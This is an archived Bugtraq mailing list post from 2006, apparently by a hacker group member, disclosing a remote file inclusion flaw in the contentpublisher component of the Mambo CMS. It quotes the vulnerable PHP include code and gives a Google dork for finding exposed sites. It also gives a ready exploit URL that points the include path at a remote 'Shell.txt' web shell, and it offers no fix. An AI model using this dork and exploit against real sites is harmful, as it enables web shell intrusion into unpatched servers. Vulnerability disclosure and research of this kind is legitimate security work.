Bugtraq mailing list archives
contentpublisher Mambo Component Remote File Include Vulnerabilities
From: crackers_child () sibersavascilar com
Date: 17 Aug 2006 20:38:57 -0000
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!! -------------------------------------------------------------------------------- Title : contentpublisher Mambo Component Remote File Include Vulnerabilities -------------------------------------------------------------------------------- #Author: Crackers_Child #cont@ct: crackers_child () sibersavascilar com -------------------------------------------------------------------------------- Google Dorks : inurl:"/com_contentpublisher/" ------------------------- ------------------------------------------------------- Application : contentpublisher/ Component of Mambo -------------------------------------------------------------------------------- Bug İn contentpublisher.php global $my, $mosConfig_live_site, $mosConfig_lang; if (file_exists($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php')) { include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php'); } else { include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/english.php'); } -------------------------------------------------------------------------------- Exploit: http://[target]/[mambo_path]/components/contentpublisher/contentpublisher.php?mosConfig_absolute_path=Shell.txt? -------------------------------------------------------------------------------- greets: All My Friends And SiberSavascilar.Com Members ! -------------------------------------------------------------------------------- --------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
Current thread:
- contentpublisher Mambo Component Remote File Include Vulnerabilities crackers_child (Aug 18)
- Re: contentpublisher Mambo Component Remote File Include Vulnerabilities Carsten Eilers (Aug 24)